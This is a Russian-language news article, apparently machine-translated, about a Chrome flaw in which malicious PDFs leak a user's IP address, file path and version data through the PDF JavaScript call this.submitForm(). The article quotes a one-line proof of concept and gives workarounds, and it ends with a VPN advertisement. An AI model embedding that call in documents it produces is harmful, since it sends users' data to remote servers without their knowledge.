Уязвимость Chrome позволяет хакерам собирать пользовательские данные с помощью файлов PDF.
Служба обнаружения эксплойтов EdgeSpot обнаружила интригующую уязвимость Chrome нулевого дня, использующую документы PDF . Уязвимость позволяет злоумышленникам собирать конфиденциальные данные, используя вредоносные документы PDF, открытые в Chrome.
Как только жертва открывает соответствующие файлы PDF в Google Chrome, вредоносная программа начинает работать в фоновом режиме, собирая пользовательские данные .
Затем данные передаются на удаленный сервер, который контролируется хакерами. Вам может быть интересно узнать, какие данные высасываются злоумышленниками, они нацелены на следующие данные на вашем ПК:
- айпи адрес
- Полный путь к файлу PDF в системе
- Версии для ОС и Chrome
Остерегайтесь вредоносных PDF-файлов
Вы можете быть удивлены, узнав, что ничего не происходит, когда Adobe Reader используется для открытия PDF-файлов . Кроме того, HTTP POST-запросы используются для передачи данных на удаленные серверы без какого-либо вмешательства пользователя.
Эксперты заметили, что один из двух доменов readnotify [.] Com или burpcollaborator [.] Net получает данные.
Вы можете представить себе интенсивность атаки, если учесть тот факт, что большинство антивирусных программ не может обнаружить образцы, обнаруженные EdgeSpot.
Эксперты выясняют, что злоумышленники используют API-интерфейс «this.submitForm ()» PDF Javascript для сбора конфиденциальной информации пользователей.
Мы протестировали его с минимальным PoC, простой вызов API, такой как «this.submitForm (‘http://google.com/test’)», заставит Google Chrome отправлять личные данные на google.com.
Эксперты фактически обнаружили, что эта ошибка Chrome использовалась двумя различными наборами вредоносных PDF-файлов. Оба они были распространены в октябре 2017 года и сентябре 2018 года соответственно.
В частности, собранные данные могут быть использованы злоумышленниками для точной настройки атак в будущем. Отчеты предполагают, что первая партия файлов была скомпилирована с использованием службы отслеживания PDF ReadNotify.
Пользователи могут использовать сервис для отслеживания просмотров пользователей. EdgeSpot не поделился какими-либо подробностями относительно характера второго набора файлов PDF.
Как оставаться защищенным
Если вы хотите быть в безопасности во время серфинга в интернете, вам понадобится специальный инструмент для защиты вашей сети. Установите сейчас Cyberghost VPN и защитите себя. Он защищает ваш компьютер от атак во время просмотра, маскирует ваш IP-адрес и блокирует любой нежелательный доступ.
Служба обнаружения эксплойтов EdgeSpot хотела предупредить пользователей Chrome о потенциальных рисках, поскольку ожидается, что исправление не будет выпущено в ближайшем будущем.
EdgeSpot сообщил Google об этой уязвимости в прошлом году, и компания пообещала выпустить патч в конце апреля. ЧАС
тем не менее, вы можете использовать временное решение проблемы, локально просматривая полученные документы PDF с помощью альтернативного приложения для чтения PDF.
Кроме того, вы также можете открыть свои документы PDF в Chrome, отключив свои системы от Интернета. Между тем, вы можете дождаться обновления Chrome 74, которое ожидается 23 апреля.
СВЯЗАННЫЕ СТАТЬИ, КОТОРЫЕ ВЫ ДОЛЖНЫ ПРОВЕРИТЬ:
- Microsoft пропускает скриншоты браузера Edge на основе Chromium
- Теперь вы можете включить поддержку смешанной реальности Windows в Chrome
- Программа Microsoft AccountGuard по кибербезопасности выходит на новые рынки